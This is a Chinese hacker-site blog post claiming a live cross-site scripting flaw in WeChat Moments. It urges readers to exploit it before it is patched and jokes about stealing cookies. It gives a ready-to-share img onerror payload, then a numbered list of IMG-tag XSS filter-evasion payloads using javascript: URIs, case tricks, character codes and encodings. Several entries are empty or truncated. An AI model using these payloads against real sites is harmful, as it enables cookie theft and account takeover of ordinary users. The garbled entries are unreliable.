刷爆了，微信朋友圈Xss，快玩吧，很快会修复

Posted 2021-04-29 黑白之道

哈哈。看下图！

搜索一下，打开就会弹窗了，是时候要盗cookies了，嘿嘿，邪恶的笑！

分享格式！像这样的，

< img src=1 onerror=confirm("距离关机还5s");prompt("呵呵!");>

具体操作过程，

获取祥细步骤！

附，Img xss 姿势

(1)普通的XSS javascript注入

<SCRIPT SRC=></SCRIPT>

(2)IMG标签XSS使用JavaScript命令

<SCRIPT SRC=></SCRIPT>

(3)IMG标签无分号无引号

<IMG SRC=javascript:alert(‘XSS’)>

(4)IMG标签大小写不敏感

<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

(5)html编码(必须有分号)

<IMG SRC=javascript:alert(“XSS”)>

(6)修正缺陷IMG标签

<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> 
(7)formCharCode标签(计算器) 
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> 
(8)UTF-8的Unicode编码(计算器) 
<IMG SRC=jav..省略..S')> 
(9)7位的UTF-8的Unicode编码是没有分号的(计算器) 
<IMG SRC=jav..省略..S')> 
(10)十六进制编码也是没有分号(计算器) 
<IMG SRC=java..省略..XSS')> 
(11)嵌入式标签,将Javascript分开 
<IMG SRC=”javascript:alert(‘XSS’);”> 

亲喜欢吗？记得点赞 | 留言 | 分享

----------------------------------

要闻，干货，原创，专业
关注“黑白之道”微信：i77169 
华夏黑客同盟我们坚持，自由，免费，共享！